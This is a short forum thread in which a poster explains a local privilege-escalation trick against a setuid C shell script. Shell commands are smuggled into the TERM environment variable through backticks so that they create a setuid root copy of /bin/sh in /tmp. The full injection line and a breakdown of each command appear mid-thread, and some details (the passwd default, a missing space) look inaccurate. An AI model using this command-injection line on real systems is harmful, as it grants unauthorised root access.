And talking about the SUID (and GUID?) bit would take a whole thread in and of itself...
Printable View
And talking about the SUID (and GUID?) bit would take a whole thread in and of itself...
Ok, in my above post, I never really explained what this little hack actaully does. So here's the explaination:Quote:
env TERM='`cp /bin/sh /tmp/sh;chown root /tmp/sh;chmod 4755/tmp/sh`' change-pass
What in the world does this command mean? it would be great if someone could break down each little thing like for example the '` part for example, just decrypt the whole line to lamens terms please, thanks !
If we had a setuid script called change-pass with the source code.It could be exploited with the line:Code:#!/bin/csh -b
set user = $1
passwd $user
env TERM='`cp /bin/sh /tmp/sh;chown root /tmp/sh;chmod 4755/tmp/sh`' change-pass
This is because C shell scripts are vulnerable to environment variable "exploits". The TERM environment variable tells the application/script that is about to be run what type of console the user is using (usually xterm or vt100). This variable is passed to all subshells of the user's shell.
The `` quotes are commonly used in scripting languages to execute system commands. For example:would store the listing of the current directory in the variable $ls.Code:$ls = `ls`;
The '' quotes just let you set an environment variable to a string that contains spaces. If you don't use the single quotes, the environment variable will get "chopped off" after the first space.
So the above line will actually execute the system command:
cp /bin/sh /tmp/sh;chown root /tmp/sh;chmod 4755/tmp/sh
This is actually several *nix commands put on the same line. A semicolon acts like a newline character. So what we're actually doing is the commands:
cp /bin/sh /tmp/sh # copies the sh binary to /tmp
chown root /tmp/sh # changes the owner of the /tmp/sh binary to root
chmod 4755/tmp/sh # sets the /tmp/sh binary's permissions to executable + setuid
Then we run the passwd command via the dodgy C shell script. Because we don't give $1 a value, passwd defaults to superuser. You should now be prompted to change the root password. Bingo, the box has been owned.
Note: This exploit also assumes that the user has full access to chown and chmod.
Thx Terr,
for the link... That was educational. As simple as it (now) seems to be, I never would have thought of it... I tried slight variations of this on my BSD box and the system wouldn't let me use the chown or chmod for files that my "testdummy" logon had no business changing, so I'm cool... for now NEway...
It is kind of freaky that SUID shell scripts can be used to change passwd like that (or any other file for that matter)... Definately something to be aware of.
Peace
Rev